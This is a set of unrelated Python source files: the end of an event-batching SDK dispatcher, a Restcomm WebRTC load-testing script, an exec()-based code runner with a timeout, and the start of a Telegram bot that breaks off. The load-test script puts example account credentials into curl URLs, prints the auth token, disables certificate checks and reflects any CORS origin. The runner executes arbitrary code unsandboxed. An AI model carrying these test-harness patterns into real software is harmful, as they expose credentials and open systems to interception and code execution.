LogMessageEnum.INFO_MESSAGES.IMPRESSION_SUCCESS_QUEUE.format( file=FILE, end_point=url, queue_length=len(self.queue), queue_metadata=self.queue_metadata ), ) else: self.logger.log( LogLevelEnum.INFO, LogMessageEnum.INFO_MESSAGES.IMPRESSION_SUCCESS.format(file=FILE, end_point=url) ) return True else: if self.event_batching is True: self.logger.log( LogLevelEnum.ERROR, LogMessageEnum.ERROR_MESSAGES.IMPRESSION_FAILED_QUEUE.format(file=FILE, end_point=url), ) else: self.logger.log( LogLevelEnum.ERROR, LogMessageEnum.ERROR_MESSAGES.IMPRESSION_FAILED.format(file=FILE, end_point=url) ) return False def async_dispatch(self, url, impression): """ This method pushes impression in queue after modifying the payload Args: url (string): VWO's url for syncing an impression impression (dict): Dictionary object containing the information of the impression Returns: bool: True if impression is successfully pushed in queue, else false """ try: # build payload payload = self.build_event_payload(url, impression) # push in queue self.queue.append(payload) self.update_queue_metadata(url=url) # flush queue periodically if len(self.queue) == 1: self.timer = threading.Timer(self.request_time_interval, self.flush_queue) self.timer.start() # flush queue when full if len(self.queue) >= self.events_per_request: self.flush_queue() return True except Exception: self.logger.log( LogLevelEnum.ERROR, LogMessageEnum.ERROR_MESSAGES.IMPRESSION_FAILED.format( file=FILE, end_point=url, ), ) return False def build_event_payload(self, url, impression): """ This method builds payload from url and impression. It can then be used in bulk api for an event Args: url (string): VWO's url for syncing an impression impression (dict): Dictionary object containing the information of the impression Returns: payload (dict): Dictionary object containing the information computed from url and impression """ if self.account_id is None: self.account_id = impression.get("account_id") url_split = url.split("/") event_name = url_split[-1] payload = { "u": impression.get("u"), "sId": impression.get("sId"), } if event_name == constants.EVENTS.TRACK_USER: payload.update({"c": impression.get("combination"), "e": impression.get("experiment_id"), "eT": 1}) elif event_name == constants.EVENTS.TRACK_GOAL: payload.update( { "c": impression.get("combination"), "e": impression.get("experiment_id"), "g": impression.get("goal_id"), "eT": 2, } ) if impression.get("r") is not None: payload.update(r=impression.get("r")) elif event_name == constants.EVENTS.PUSH: payload.update({"t": impression.get("tags"), "eT": 3}) return payload def spawn_thread_to_sync(self, events): """ Spawns a thread to sync events to VWO servers Args: events (list): List of events to be synced to VWO servers """ sync_thread = threading.Thread(target=self.sync_with_vwo, args=(events,)) sync_thread.start() def sync_with_vwo(self, events): url = constants.HTTPS_PROTOCOL + constants.ENDPOINTS.BASE_URL url = url + constants.ENDPOINTS.BATCH_EVENTS queue_length = len(events) try: query_params = {"a": self.account_id, "sdk": self.sdk, "sdk-v": self.sdk_v, "env": self.sdk_key} post_data = {"ev": events} query_params.update(UsageStats.get_usage_stats()) headers = {"Authorization": self.sdk_key} resp = self.connection.post(url, params=query_params, data=post_data, headers=headers) status_code = resp.get("status_code") if status_code == 200: self.logger.log( LogLevelEnum.INFO, LogMessageEnum.INFO_MESSAGES.IMPRESSION_SUCCESS.format( file=FILE, end_point=url, account_id=self.account_id, ), ) elif status_code == 413: self.logger.log( LogLevelEnum.ERROR, LogMessageEnum.ERROR_MESSAGES.BATCH_EVENT_LIMIT_EXCEEDED.format( file=FILE, end_point=url, events_per_request=queue_length, account_id=self.account_id, ), ) else: self.logger.log( LogLevelEnum.ERROR, LogMessageEnum.ERROR_MESSAGES.BULK_NOT_PROCESSED.format( file=FILE, ), ) if self.flush_callback: self.flush_callback(None, events) except Exception as err: self.logger.log( LogLevelEnum.ERROR, LogMessageEnum.ERROR_MESSAGES.BULK_NOT_PROCESSED.format( file=FILE, ), ) if self.flush_callback: self.flush_callback(err, events) def flush_queue(self, manual=False, mode="async"): """ Flush_queue Args: manual(bool): Informs if the function was triggered manually by user or not mode(string): In sync mode, function makes a synchronous call before exiting In async mode, function spawns a thread to sync to VWO and exits """ if self.event_batching is False: return events = self.queue no_of_events = len(events) queue_metadata = self.queue_metadata if no_of_events < 1: return self.logger.log( LogLevelEnum.DEBUG, LogMessageEnum.DEBUG_MESSAGES.BEFORE_FLUSHING.format( file=FILE, manually="manually" if manual else "", length=no_of_events, timer="Timer will be cleared and registered again" if manual else "", queue_metadata=queue_metadata, ), ) # stop timer if self.timer: self.timer.cancel() # flush queue self.queue = [] self.queue_metadata = {} self.logger.log( LogLevelEnum.INFO, LogMessageEnum.INFO_MESSAGES.AFTER_FLUSHING.format( file=FILE, length=no_of_events, manually="manually" if manual else "", queue_metadata=queue_metadata ), ) if mode == "async": self.spawn_thread_to_sync(events=events) else: self.sync_with_vwo(events=events) def update_queue_metadata(self, url): url_split = url.split("/") event_name = url_split[-1] if self.queue_metadata.get(event_name) is None: self.queue_metadata[event_name] = 0 self.queue_metadata[event_name] += 1
restcomm-test.py
#! /usr/bin/env python # Load testing Restcomm Media Server # # Example invocations: # - Secure invocation: # $ ./restcomm-test.py --client-count 50 --client-url https://192.168.2.3:10510/webrtc-client.html --client-register-ws-url wss://192.168.2.3:5083 --client-register-domain 192.168.2.3 --client-username-prefix user --client-password 1234 --restcomm-account-sid ACae6e420f425248d6a26948c17a9e2acf --restcomm-auth-token 0d01c95aac798602579fe08fc2461036 --restcomm-base-url https://192.168.2.3:8443 --restcomm-phone-number "+5556" --restcomm-external-service-url http://192.168.2.3:10512/rcml --client-browser "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --client-web-app-dir ../webrtc-load-tests/ --client-respawn-url https://192.168.2.3:10511/respawn-user # # TODOs: # # - Enhance this so that it also works in Linux machines. Currently it has been tested only in OSX. Some changes needed: # * Browser executables reside in different places # - Fix the unprovisioning functionality also remove the Restcomm Clients and Restcomm Number # - Make accountSid and authToken not required since we have introduced the --test-modes where we can configure if we want provisioning to take place or not # import argparse import sys import json import time import ssl import subprocess import os import re import urllib import urlparse import signal import datetime from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer from socket import * from threading import Thread # Notice that we are using the dummy module which is implemented with threads, # not multiple processes, as processes might be overkill in our situation (in # case for example we want to spawn hundredths) # # To use multiple processes instead we should use: # import multiprocessing # And replace ThreadPool with Pool from multiprocessing.dummy import Pool as ThreadPool # Selenium imports from selenium import webdriver from selenium.webdriver.common.keys import Keys from selenium.webdriver.chrome.options import Options from selenium.webdriver.common.desired_capabilities import DesiredCapabilities from selenium.webdriver.support import expected_conditions from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.common.by import By import selenium.common.exceptions # Globals # Version VERSION = "0.3.4" # TAG for console logs TAG = '[restcomm-test] ' # Keep the nodejs process in a global var so that we can reference it after the tests are over to shut it down httpProcess = None # Used in non-selenium runs browserProcesses = list() # restcomm test modes. Which parts of the tool do we want executed (bitmap): # - 001: Spawn webrtc browsers # - 010: Start HTTP server for external service & web app # - 100: Do Restcomm provisioning/unprovisioning testModes = None # Command line args args = None # list containing a dictionary for each webrtc client browser we are spawning clients = None # number of browsers spawned so far totalBrowserCount = 0 # log index logIndex = 0 def threadFunction(dictionary): try: print TAG + 'browser thread #' + str(dictionary['id']) + ' Running test for URL: ' + dictionary['url'] chromeOptions = Options() # important: don't request permission for media chromeOptions.add_argument("--use-fake-ui-for-media-stream") # enable browser logging caps = DesiredCapabilities.CHROME #caps['loggingPrefs'] = {'browser': 'ALL', 'client': 'ALL', 'driver': 'ALL', 'performance': 'ALL', 'server': 'ALL'} caps['loggingPrefs'] = { 'browser':'ALL' } #driver = webdriver.Chrome(chrome_options = chromeOptions, desired_capabilities = caps, service_args = ["--verbose", "--log-path=chrome.log"]) driver = webdriver.Chrome(chrome_options = chromeOptions, desired_capabilities = caps) # navigate to web page driver.get(dictionary['url']) #print driver.title #print 'Waiting for condition to be met' #WebDriverWait(driver, 30).until(expected_conditions.text_to_be_present_in_element((By.ID,'log'), 'Connection ended')) # this is actually a hack to keep the browser open for n seconds. Putting the thread to sleep doesn't work and so far I haven't found a nice way to do that in Selenium WebDriverWait(driver, 300).until(expected_conditions.text_to_be_present_in_element((By.ID,'log'), 'Non existing text')) except selenium.common.exceptions.TimeoutException as ex: print TAG + 'EXCEPTION: browser thread #' + str(dictionary['id']) + ' Test timed out' except: print TAG + 'EXCEPTION: browser thread #' + str(dictionary['id']) + ' Unexpected exception: ', sys.exc_info()[0] return # print messages print TAG + 'browser thread #' + str(dictionary['id']) + ' Saving the logs' logBuffer = '' for entry in driver.get_log('browser'): # entry is a dictionary logBuffer += json.dumps(entry, indent = 3) logFile = open('browser#' + str(dictionary['id']) + '.log', 'a') logFile.write(logBuffer) logFile.close() print TAG + 'browser thread #' + str(dictionary['id']) + ' Closing Driver' driver.close() def signalHandler(signal, frame): print('User interrupted testing with SIGINT; bailing out') stopServer() sys.exit(0) # take a url and break it in protocol and transport counterparts def breakUrl(url): matches = re.search('(^.*?:\/\/)(.*$)', url) protocol = matches.group(1) transport = matches.group(2) return protocol, transport # Return the account base Restcomm URL, like http://ACae6e420f425248d6a26948c17a9e2acf:0d01c95aac798602579fe08fc2461036@127.0.0.1:8080/restcomm/2012-04-24/Accounts/ACae6e420f425248d6a26948c17a9e2acf, # from base URL (i.e. http://127.0.0.1:8080), account sid and auth token def restBaseUrlFromCounterparts(accountSid, authToken, restcommUrl): # Need to break URL in protocol and transport parts so that we can put account sid and auth token in between matches = re.search('(^.*?:\/\/)(.*$)', restcommUrl) #protocol = matches.group(1) #transport = matches.group(2) protocol, transport = breakUrl(restcommUrl) return protocol + accountSid + ':' + authToken + '@' + transport + '/restcomm/2012-04-24/Accounts/' + accountSid # curl will break if we target an https server that has self signed certificate. Let's always use -k (avoid checks for cert) when targeting https def curlSecureOptionsIfApplicable(restcommUrl): protocol, transport = breakUrl(restcommUrl) if protocol == 'https://': return '-k' else: return '' # Provision Restcomm Number for external service via REST call def provisionPhoneNumber(phoneNumber, externalServiceUrl, accountSid, authToken, restcommUrl): print TAG + "Provisioning phone number " + phoneNumber + ' and linking it with Voice URL: ' + externalServiceUrl devnullFile = open(os.devnull, 'w') # Need to break URL in protocol and transport parts so that we can put account sid and auth token in between matches = re.search('(^.*?:\/\/)(.*$)', restcommUrl) protocol = matches.group(1) transport = matches.group(2) postData = { 'PhoneNumber': phoneNumber, 'VoiceUrl': externalServiceUrl, 'VoiceMethod': 'GET', 'FriendlyName': 'Load Testing App', 'isSIP' : 'true', } #cmd = 'curl -X POST ' + restBaseUrlFromCounterparts(accountSid, authToken, restcommUrl) + '/IncomingPhoneNumbers.json -d PhoneNumber=' + phoneNumber + ' -d VoiceUrl=' + externalServiceUrl + ' -d FriendlyName=LoadTestingApp -d isSIP=true' cmd = 'curl ' + curlSecureOptionsIfApplicable(restcommUrl) + ' -X POST ' + restBaseUrlFromCounterparts(accountSid, authToken, restcommUrl) + '/IncomingPhoneNumbers.json -d ' + urllib.urlencode(postData) print TAG + cmd #subprocess.call(cmd.split(), stdout = devnullFile, stderr = devnullFile) # remember this runs the command synchronously subprocess.call(cmd.split()) # Provision Restcomm Clients via REST call # count: number of Clients to provision # accountSid: Restcomm accountSid, like: ACae6e420f425248d6a26948c17a9e2acf # authToken: Restcomm authToken, like: 0a01c34aac72a432579fe08fc2461036 # restcommUrl: Restcomm URL, like: http://127.0.0.1:8080 def provisionClients(count, accountSid, authToken, restcommUrl, usernamePrefix, password): print TAG + "Provisioning " + str(count) + " Restcomm Clients" devnullFile = open(os.devnull, 'w') # Need to break URL in protocol and transport parts so that we can put account sid and auth token in between matches = re.search('(^.*?:\/\/)(.*$)', restcommUrl) protocol = matches.group(1) transport = matches.group(2) for i in range(1, count + 1): postData = { 'Login': usernamePrefix + str(i), 'Password': password, } #cmd = 'curl -X POST ' + restBaseUrlFromCounterparts(accountSid, authToken, restcommUrl) + '/Clients.json -d Login=user' + str(i) + ' -d Password=1234' cmd = 'curl ' + curlSecureOptionsIfApplicable(restcommUrl) + ' -X POST ' + restBaseUrlFromCounterparts(accountSid, authToken, restcommUrl) + '/Clients.json -d ' + urllib.urlencode(postData) #system(cmd) print TAG + cmd #subprocess.call(cmd.split(), stdout = devnullFile, stderr = devnullFile) subprocess.call(cmd.split()) def startServer(count, clientUrl, externalServiceUrl, usernamePrefix, clientWebAppDir, clientRole): print TAG + 'Starting http server to handle both http/https request for the webrtc-client web page, and RCML REST requests from Restcomm' externalServicePort = '80' externalServiceParsedUrl = urlparse.urlparse(externalServiceUrl); if externalServiceParsedUrl.port: externalServicePort = externalServiceParsedUrl.port webAppPort = '80' clientParsedUrl = urlparse.urlparse(clientUrl); if (clientParsedUrl.port): webAppPort = clientParsedUrl.port secureArg = '' if clientParsedUrl.scheme == 'https': secureArg = '--secure-web-app' # Make a copy of the current environment envDictionary = dict(os.environ) # Add the nodejs path, as it isn't found when we run as root envDictionary['NODE_PATH'] = '/usr/local/lib/node_modules' #cmd = 'server.js ' + str(count) + ' 10512 10510 10511' cmd = 'node http-server.js --client-count ' + str(count) + ' --external-service-port ' + str(externalServicePort) + ' --external-service-client-prefix ' + usernamePrefix + ' --web-app-port ' + str(webAppPort) + ' ' + secureArg + ' --web-app-dir ' + clientWebAppDir + ' --client-role ' + clientRole # We want it to run in the background #os.system(cmd) #subprocess.call(cmd.split(), env = envDictionary) #print "--- CMD: " + cmd global httpProcess httpProcess = subprocess.Popen(cmd.split(), env = envDictionary) #httpProcess = subprocess.Popen(cmd.split()) print TAG + 'PID for http server: ' + str(httpProcess.pid) # TODO: Not finished yet def unprovisionClients(count, accountSid, authToken, restcommUrl): print TAG + "(Not implemented yet) Unprovisioning " + str(count) + " Restcomm Clients" #for i in range(1, count + 1): # cmd = 'curl ' + curlSecureOptionsIfApplicable(restcommUrl) + ' -X DELETE http://' + accountSid + ':' + authToken + '@' + transport + '/restcomm/2012-04-24/Accounts/' + accountSid + '/Clients.json -d Login=user' + str(i) + ' -d Password=1234' # ... def stopServer(): if httpProcess: print TAG + 'Stopping http server' httpProcess.terminate() def globalSetup(dictionary): print TAG + "Setting up tests" global testModes # if user asked for restcomm provisioning/unprovisioning (i.e. testModes = 001 binary) if testModes & 1: # Provision Restcomm with the needed Clients provisionPhoneNumber(dictionary['phone-number'], dictionary['external-service-url'], dictionary['account-sid'], dictionary['auth-token'], dictionary['restcomm-base-url']) if dictionary['client-role'] == 'passive': # Provision Restcomm with the needed Clients only when in passive mode provisionClients(dictionary['count'], dictionary['account-sid'], dictionary['auth-token'], dictionary['restcomm-base-url'], dictionary['username-prefix'], dictionary['password']) # if user asked for http server to be started (i.e. testModes = 010 binary) if testModes & 2: # Start the unified server script to serve both RCML (REST) and html page for webrtc clients to connect to startServer(dictionary['count'], dictionary['client-url'], dictionary['external-service-url'], dictionary['username-prefix'], dictionary['client-web-app-dir'], dictionary['client-role']) def globalTeardown(dictionary): print TAG + "Tearing down tests" global testModes # if user asked for restcomm provisioning/unprovisioning (i.e. testModes = 001 binary) if testModes & 1: # Provision Restcomm with the needed Clients unprovisionClients(dictionary['count'], dictionary['account-sid'], dictionary['auth-token'], dictionary['restcomm-base-url']) # if user asked for http server to be started (i.e. testModes = 010 binary) if testModes & 2: # Start the unified server script to serve both RCML (REST) and html page for webrtc clients to connect to stopServer() # Check if a command exists def commandExists(cmd): for path in os.environ["PATH"].split(os.pathsep): path = path.strip('"') execFile = os.path.join(path, cmd) if os.path.isfile(execFile) and os.access(execFile, os.X_OK): return True return False # Check if a process is running def processRunning(cmd): output = subprocess.check_output('ps ax'.split()) for line in output.splitlines(): if re.search('Xvfb', line): return True return False # Spawn browsers for all 'clients' def spawnBrowsers(browserCommand, clients, totalBrowserCount, logIndex, headless, display, threaded): envDictionary = None cmdList = None #global totalBrowserCount #global logIndex #totalBrowserCount += len(clients) # TODO: we could make work both in Linux/Darwin but we need extra handling here #osName = subprocess.check_output(['uname']) if re.search('chrom', browserCommand, re.IGNORECASE): envDictionary = None # Make a copy of the current environment envDictionary = dict(os.environ) # Set the chrome log file #envDictionary['CHROME_LOG_FILE'] = 'browser#' + str(client['id']) + '.log' #envDictionary['CHROME_LOG_FILE'] = 'chrome.log.' + str(datetime.datetime.utcnow()).replace(' ', '.') envDictionary['CHROME_LOG_FILE'] = 'chrome.log.' + str(logIndex) #logIndex += 1 if headless: envDictionary['DISPLAY'] = display cmdList = [ browserCommand, #'--user-data-dir=' + str(client['id']), #'--incognito', #'--new-window', '--no-first-run', # even if it's the first time Chrome is starting up avoid showing the welcome message, which needs user intervention and causes issues on headless environment '--enable-logging', # enable logging at the specified file #'--vmodule=webrtc-client*', # not tested '--use-fake-ui-for-media-stream', # don't require user to grant permission for microphone and camera '--use-fake-device-for-media-stream', # don't use real microphone and camera for media, but generate fake media '--ignore-certificate-errors', # don't check server certificate for validity, again to avoid user intervention #'--process-per-tab', # not tested ] else: # Make a copy of the current environment envDictionary = None envDictionary = dict(os.environ) # Set the chrome log file #envDictionary['NSPR_LOG_FILE'] = 'browser#' + str(client['id']) + '.log' envDictionary['NSPR_LOG_FILE'] = 'firefox.log' # not sure why but this is the 'module' name for the web console and '5' to get all levels envDictionary['NSPR_LOG_MODULES'] = 'timestamp,textrun:5' #envDictionary['NSPR_LOG_MODULES'] = 'timestamp,all:3' if headless: envDictionary['DISPLAY'] = display # Firefox cmdList = [ browserCommand, '--jsconsole', # without this I'm not getting proper logs for some weird reason #'--args', #'--new-tab', #client['url'], ] # add all the links in the command after the options for client in clients: cmdList.append(client['url']) separator = ' ' print TAG + 'Spawning ' + str(len(clients)) + ' browsers (total: ' + str(totalBrowserCount) + '). Command: ' + separator.join(cmdList) devnullFile = open(os.devnull, 'w') # We want it to run in the background if threaded: subprocess.Popen(cmdList, env = envDictionary, stdout = devnullFile, stderr = devnullFile) else: browserProcess = subprocess.Popen(cmdList, env = envDictionary, stdout = devnullFile, stderr = devnullFile) # Define a handler for the respawn HTTP server class httpHandler(BaseHTTPRequestHandler): def do_GET(self): responseText = None if re.search('^/respawn-user.*', self.path) == None: self.send_response(501) responseText = 'Not Implemented, please use /respawn-user' else: self.send_response(200) # query string for the GET request qsDictionary = None if '?' in self.path: qsDictionary = urlparse.parse_qs(urlparse.urlparse(self.path).query) else: print '--- Not found ? in request' return print 'Received respawn request: ' + json.dumps(qsDictionary, indent = 3) global totalBrowserCount global logIndex # check which 'client' the request is for for client in clients: if client['id'] == qsDictionary['username'][0]: respawnClients = list() respawnClients.append(client) totalBrowserCount += len(respawnClients) spawnBrowserThread = Thread(target = spawnBrowsers, args = (args.clientBrowserExecutable, respawnClients, totalBrowserCount, logIndex, args.clientHeadless, args.clientHeadlessDisplay, False)) spawnBrowserThread.start() logIndex += 1 #spawnBrowsers(args.clientBrowserExecutable, respawnClients, totalBrowserCount, logIndex, args.clientHeadless, args.clientHeadlessDisplay, True) responseText = 'Spawning new browser with username: ' + qsDictionary['username'][0] self.send_header('Content-type', 'text/html') # Allow requests from any origin (CORS) self.send_header("Access-Control-Allow-Origin", self.headers.get('Origin')) self.end_headers() self.wfile.write(responseText) return # HTTP server listening for AJAX requests and spawning new browsers when existing browsers finish with the call and close def startRespawnServer(respawnUrl): respawnPort = '80' respawnParsedUrl = urlparse.urlparse(respawnUrl); if respawnParsedUrl.port: respawnPort = respawnParsedUrl.port print TAG + 'Starting respawn HTTP server at port: ' + str(respawnPort) httpd = None serverAddress = ('', respawnPort) httpd = HTTPServer(serverAddress, httpHandler) if respawnParsedUrl.scheme == 'https': httpd.socket = ssl.wrap_socket(httpd.socket, keyfile='cert/key.pem', certfile='cert/cert.pem', server_side=True) httpd.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) size = httpd.socket.getsockopt(SOL_SOCKET, SO_RCVBUF) print 'Socket recv buffer size: ' + str(size) httpd.socket.setsockopt(SOL_SOCKET, SO_RCVBUF, size * 2) newSize = httpd.socket.getsockopt(SOL_SOCKET, SO_RCVBUF) print 'Socket recv buffer size after set: ' + str(newSize) httpd.serve_forever() ## --------------- Main code --------------- ## parser = argparse.ArgumentParser() parser.add_argument('-c', '--client-count', dest = 'count', default = 10, type = int, help = 'Count of Webrtc clients spawned for the test') parser.add_argument('--client-url', dest = 'clientUrl', default = 'http://127.0.0.1:10510/webrtc-client.html', help = 'Webrtc clients target URL, like \'http://127.0.0.1:10510/webrtc-client.html\'') parser.add_argument('--client-web-app-dir', dest = 'clientWebAppDir', default = '.', help = 'Directory where the web app resides, so that our http server knows what to serve, like \'../webrtc-load-tests\'') parser.add_argument('--client-register-ws-url', dest = 'registerWsUrl', default = 'ws://127.0.0.1:5082', help = 'Webrtc clients target websocket URL for registering, like \'ws://127.0.0.1:5082\'') parser.add_argument('--client-register-domain', dest = 'registerDomain', default = '127.0.0.1', help = 'Webrtc clients domain for registering, like \'127.0.0.1\'') parser.add_argument('--client-username-prefix', dest = 'usernamePrefix', default = 'user', help = 'User prefix for the clients, like \'user\'') parser.add_argument('--client-password', dest = 'password', default = '1234', help = 'Password for the clients, like \'1234\'') parser.add_argument('--client-browser-executable', dest = 'clientBrowserExecutable', default = 'chromium-browser', help = 'Browser executable for the test. Can be full path (if not in PATH), like \'/Applications/Firefox.app/Contents/MacOS/firefox-bin\', \'/Applications/Google Chrome.app/Contents/MacOS/Google Chrome\' (for OSX) or just executable, like \'firefox\', \'chromium-browser\' (for GNU/Linux), default is \'chromium-browser\'') parser.add_argument('--client-headless', dest = 'clientHeadless', action = 'store_true', default = False, help = 'Should we use a headless browser?') parser.add_argument('--client-respawn', dest = 'respawn', action = 'store_true', default = False, help = 'Should we use respawn browser logic? This means a. starting an http server to listen for respawn requests (see --client-respawn-url) and b. tell the clients to close the tabs after done with the call scenario') parser.add_argument('--client-respawn-url', dest = 'respawnUrl', default = 'http://127.0.0.1:10511/respawn-user', help = 'Webrtc clients respawn URL to be notified when the call is over, like \'http://127.0.0.1:10511/respawn-user\'') parser.add_argument('--client-headless-x-display', dest = 'clientHeadlessDisplay', default = ':99', help = 'When using headless, which virtual X display to use when setting DISPLAY env variable. Default is \':99\'') parser.add_argument('--client-role', dest = 'clientRole', default = 'passive', help = 'Role for the client. When \'active\' it makes a call to \'--target-sip-uri\'. When \'passive\' it waits for incoming call. Default is \'passive\'') parser.add_argument('--client-target-uri', dest = 'clientTargetUri', default = '+1234@127.0.0.1', help = 'Client target URI when \'--client-role\' is \'active\' (it\'s actually a SIP URI without the \'sip:\' part. Default is \'+1234@127.0.0.1\'') parser.add_argument('--restcomm-base-url', dest = 'restcommBaseUrl', default = 'http://127.0.0.1:8080', help = 'Restcomm instance base URL, like \'http://127.0.0.1:8080\'') parser.add_argument('--restcomm-account-sid', dest = 'accountSid', required = True, help = 'Restcomm accound Sid, like \'ACae6e420f425248d6a26948c17a9e2acf\'') parser.add_argument('--restcomm-auth-token', dest = 'authToken', required = True, help = 'Restcomm auth token, like \'0a01c34aac72a432579fe08fc2461036\'') parser.add_argument('--restcomm-phone-number', dest = 'phoneNumber', default = '+5556', help = 'Restcomm phone number to provision and link with external service, like \'+5556\'') parser.add_argument('--restcomm-external-service-url', dest = 'externalServiceUrl', default = 'http://127.0.0.1:10512/rcml', help = 'External service URL for Restcomm to get RCML from, like \'http://127.0.0.1:10512/rcml\'') parser.add_argument('--test-modes', dest = 'testModes', default = 7, type = int, help = 'Testing modes for the load test. Which parts of the tool do we want to run? Provisioning, HTTP server, client browsers or any combination of those. This is a bitmap where binary 001 (i.e. 1) means to do provisioning unprovisioning, binary 010 (i.e. 2) means start HTTP(S) server and binary 100 (i.e. 4) means to spawn webrtb browsers. Default is binary 111 (i.e. 7) which means to do all the above') parser.add_argument('--version', action = 'version', version = 'restcomm-test.py ' + VERSION) args = parser.parse_args() print TAG + 'Webrtc clients settings: \n\tcount: ' + str(args.count) + '\n\ttarget URL: ' + args.clientUrl + '\n\tregister websocket url: ' + args.registerWsUrl + '\n\tregister domain: ' + args.registerDomain + '\n\tusername prefix: ' + args.usernamePrefix + '\n\tpassword: ' + args.password + '\n\tbrowser executable: ' + args.clientBrowserExecutable + '\n\theadless: ' + str(args.clientHeadless) + '\n\theadless X display: ' + args.clientHeadlessDisplay + '\n\trespawn client browsers: ' + str(args.respawn) + '\n\trespawn url: ' + args.respawnUrl + '\n\tclient role: ' + args.clientRole + '\n\tclient target SIP URI: ' + args.clientTargetUri print TAG + 'Restcomm instance settings: \n\tbase URL: ' + args.restcommBaseUrl + '\n\taccount sid: ' + args.accountSid + '\n\tauth token: ' + args.authToken + '\n\tphone number: ' + args.phoneNumber + '\n\texternal service URL: ' + args.externalServiceUrl print TAG + 'Testing modes: ' + str(args.testModes) # assign to global to be able to use from functions testModes = args.testModes # Let's handle sigint so the if testing is interrupted we still cleanup signal.signal(signal.SIGINT, signalHandler) globalSetup({ 'count': args.count, 'client-url': args.clientUrl, 'username-prefix': args.usernamePrefix, 'password': args.password, 'account-sid': args.accountSid, 'auth-token': args.authToken, 'restcomm-base-url': args.restcommBaseUrl, 'phone-number': args.phoneNumber, 'external-service-url': args.externalServiceUrl, 'client-web-app-dir': args.clientWebAppDir, 'client-role': args.clientRole, }) # Populate a list with browser thread ids and URLs for each client thread that will be spawned clients = list() for i in range(1, args.count + 1): GETData = { 'username': args.usernamePrefix + str(i), 'password': args.password, 'register-ws-url': args.registerWsUrl, 'register-domain': args.registerDomain, 'fake-media': str(args.clientHeadless).lower(), 'role': args.clientRole, } if args.respawn: GETData['respawn-url'] = args.respawnUrl; GETData['close-on-end'] = 'true'; if args.clientRole == 'active': GETData['call-destination'] = args.clientTargetUri; clients.append({ 'id': GETData['username'], 'url' : args.clientUrl + '?' + urllib.urlencode(GETData) }) browserProcess = None # if user asked for browsers to be spawned (i.e. testModes = 100 binary) if testModes & 4: if args.clientHeadless: if not commandExists('Xvfb'): # Check if Xvfb exists print 'ERROR: Running in headless mode but Xvfb does not exist' stopServer() sys.exit(1) if not processRunning('Xvfb'): print 'ERROR: Running in headless mode but Xvfb is not running' stopServer() sys.exit(1) useSelenium = False; if useSelenium: print TAG + 'Spawning ' + str(args.count) + ' tester threads' # Make the Pool of workers pool = ThreadPool(args.count) # Open the urls in their own threads and return the results try: results = pool.map(threadFunction, clients) except: print TAG + 'EXCEPTION: pool.map() failed. Unexpected exception: ', sys.exc_info()[0] # Close the pool and wait for the work to finish pool.close() pool.join() else: # No selenium, spawn browsers manually (seems to scale better than selenium) #global totalBrowserCount #global logIndex # check which 'client' the request is for totalBrowserCount += len(clients) spawnBrowsers(args.clientBrowserExecutable, clients, totalBrowserCount, logIndex, args.clientHeadless, args.clientHeadlessDisplay, False) logIndex += 1 # Start the respawn server which monitors if browsers are closing after handling call scenario and creates new in their place so that load testing can carry on if args.respawn: startRespawnServer(args.respawnUrl) print TAG + 'Please start call scenarios. Press Ctrl-C to stop ...' # raw_input doesn't exist in 3.0 and inputString issues an error in 2.7 if (sys.version_info < (3, 0)): inputString = raw_input(TAG + 'Press any key to stop the test...\n') else: inputString = input(TAG + 'Press any key to stop the test...') # if user asked for browsers to be spawned (i.e. testModes = 100 binary) if testModes & 4: if not useSelenium: print TAG + "Stopping browser" browserProcess.kill() globalTeardown({ 'count': args.count, 'username': args.password, 'password': args.password, 'account-sid': args.accountSid, 'auth-token': args.authToken, 'restcomm-base-url': args.restcommBaseUrl, 'phone-number': args.phoneNumber, 'external-service-url': args.externalServiceUrl })
script.py
import io,os,sys,time,threading,ctypes,inspect,traceback def _async_raise(tid, exctype): tid = ctypes.c_long(tid) if not inspect.isclass(exctype): exctype = type(exctype) res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exctype)) if res == 0: raise ValueError("invalid thread id") elif res != 1: ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None) raise SystemError("Timeout Exception") def stop_thread(thread): _async_raise(thread.ident, SystemExit) def text_thread_run(code): try: env={} exec(code, env, env) except Exception as e: print(e) # This is the code to run Text functions... def mainTextCode(code): global thread1 thread1 = threading.Thread(target=text_thread_run, args=(code,),daemon=True) thread1.start() timeout = 15 # change timeout settings in seconds here... thread1_start_time = time.time() while thread1.is_alive(): if time.time() - thread1_start_time > timeout: stop_thread(thread1) raise TimeoutError time.sleep(1)
default.py
from multiprocessing import Process from default_methods import * from default_server import * from default_sound import * if __name__ == "__main__": server_thread = Process(target=start_server) server_thread.start() while input('Exit [yes/no]: ') != 'yes': continue server_thread.join() # vim: tabstop=3 noexpandtab shiftwidth=3 softtabstop=3
brokenimebot.py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- ''' Broken IME bot - Imitate recently broken Telegram iOS IME support This program is free software. It comes without any warranty, to the extent permitted by applicable law. You can redistribute it and/or modify it under the terms of the Do What The Fuck You Want To Public License, Version 2, as published by Sam Hocevar. See http://www.wtfpl.net/ for more details. ''' import re import sys import time import json import queue import random import logging import requests import functools import threading import concurrent.futures import jieba import brokenime logging.basicConfig(stream=sys.stderr, format='%(asctime)s [%(name)s:%(levelname)s] %(message)s', level=logging.DEBUG if sys.argv[-1] == '-v' else logging.INFO) logger_botapi = logging.getLogger('botapi') executor = concurrent.futures.ThreadPoolExecutor(5) HSession = requests.Session() def fake_yubikey(prefix='cccccc'): alphabet = 'cbdefghijklnrtuv' return prefix + ''.join(random.choice(alphabet) for i in range(44 - len(prefix))) class AttrDict(dict): def __init__(self, *args, **kwargs): super(AttrDict, self).__init__(*args, **kwargs) self.__dict__ = self class BotAPIFailed(Exception): pass def async_func(func): @functools.wraps(func) def wrapped(*args, **kwargs): def func_noerr(*args, **kwargs): try: func(*args, **kwargs) except Exception: logger_botapi.exception('Async function failed.') executor.submit(func_noerr, *args, **kwargs) return wrapped def bot_api(method, **params): for att in range(3): try: req = HSession.get(('https://api.telegram.org/bot%s/' % CFG.apitoken) + method, params=params, timeout=45) retjson = req.content ret = json.loads(retjson.decode('utf-8')) break except Exception as ex: if att < 1: time.sleep((att + 1) * 2) else: raise ex if not ret['ok']: raise BotAPIFailed(repr(ret)) return ret['result'] @async_func def answer(inline_query_id, results, **kwargs): return bot_api('answerInlineQuery', 